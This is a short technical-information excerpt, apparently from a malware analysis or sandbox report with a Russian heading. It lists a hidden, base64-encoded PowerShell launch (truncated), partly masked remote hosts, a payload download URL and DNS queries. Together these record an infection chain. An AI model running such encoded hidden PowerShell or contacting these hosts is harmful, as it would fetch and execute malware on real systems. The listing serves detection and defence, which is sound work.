Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -enco JABMAHEAdwB3AGwAeABrAHcAdQBqAHUAPQAnAE8AbwBoAGIAZgB6AGMAdQBjAGwAJwA7ACQAWQB4AHEAcwBsAHoAaQBpAGoAYwBnACAAPQAgACcANQA4ADYAJwA7ACQASABqAGYAYwB0AHUAZwBvAGsAYgBjAD0AJwBPAG8...
- 'bl##.aidhoo.com':80
- 'hu###omains.com':443
- 'ca####e-daher.com':443
- http://bl##.aidhoo.com/m4e46dr/qIVhQJ/
- 'hu###omains.com':443
- 'ca####e-daher.com':443
- DNS ASK vi####.#araokelagramola.es
- DNS ASK ge######.milgestiones.es
- DNS ASK bl##.aidhoo.com
- DNS ASK hu###omains.com
- DNS ASK ca####e-daher.com
- DNS ASK ge###urkiye.net